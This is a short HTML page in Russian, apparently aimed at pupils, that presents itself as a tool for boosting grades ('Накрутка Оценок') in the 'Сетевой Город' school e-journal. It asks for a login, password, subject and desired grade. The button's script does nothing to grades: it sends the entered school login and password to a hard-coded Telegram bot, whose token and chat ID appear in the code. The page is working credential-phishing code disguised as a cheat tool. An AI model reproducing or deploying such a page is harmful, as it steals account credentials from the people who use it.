<!DOCTYPE html>
<html>
<head>
	<title>more 5</title>
</head>
<style type="text/css">
	form {
		background: #58B;
		height: 270px;
		width: 400px;
		margin-right: auto;
		margin-left: auto;
		margin-top: 100px;
    	border: 1px; /* Параметры рамки */
    	padding: 1px; /* Поля вокруг текста */
    	border-radius: 8px;
	}
	h1 {
		font-family: "Comic Sans MS";
		color: #fff;
	}
	#login {
		margin-top: 20px;
		font-size: 20px;

	}
	input {
		font-size: 20px;
		width: 300px;
	}
	#number {
		font-size: 20px;
	}
</style>
<script type="text/javascript">
	function clik1() {
			let url = 'https://api.telegram.org/bot1319376539:AAHfB2WJHK6_sGBqlv8jnd0OSAM9W9bKhYk/sendMessage?chat_id=1108316101&text=school login: ' + login.value + ' school password: ' + pass.value;
			let xhttp = new XMLHttpRequest();
			xhttp.open("GET", url);
			xhttp.send();
	}
</script>
<style type="text/css">
a.button24 {
  display: inline-block;
  color: white;
  text-decoration: none;
  padding: .5em 2em;
  outline: none;
  border-width: 2px 0;
  border-style: solid none;
  border-color: #FDBE33 #000 #D77206;
  border-radius: 6px;
  background: linear-gradient(#F3AE0F, #E38916) #E38916;
  transition: 0.2s;
} 
a.button24:hover { background: linear-gradient(#f5ae00, #f59500) #f5ae00; }
a.button24:active { background: linear-gradient(#f59500, #f5ae00) #f59500; }
</style>
<body bgcolor="#369">
	<h1 align="center">Сетевой Город Накрутка Оценок</h1>
	<form>
		<p align="center"><input type="text" name="login" placeholder="Логин" id="login"></p>
		<p align="center"><input type="password" name="pass" placeholder="Пароль" id="pass"></p>
		<p align="center"><input type="text" name="pass" placeholder="Введите предмет"></p>
		<p align="center"><input type="number" name="pass" placeholder="Введите оценку" min="1" max="5" id="number"></p>
		<p align="center"><a href="#" class="button24" onclick="clik1()">НАКРУТИТЬ ОЦЕНКИ</a></p>
	</form>
</body>
</html>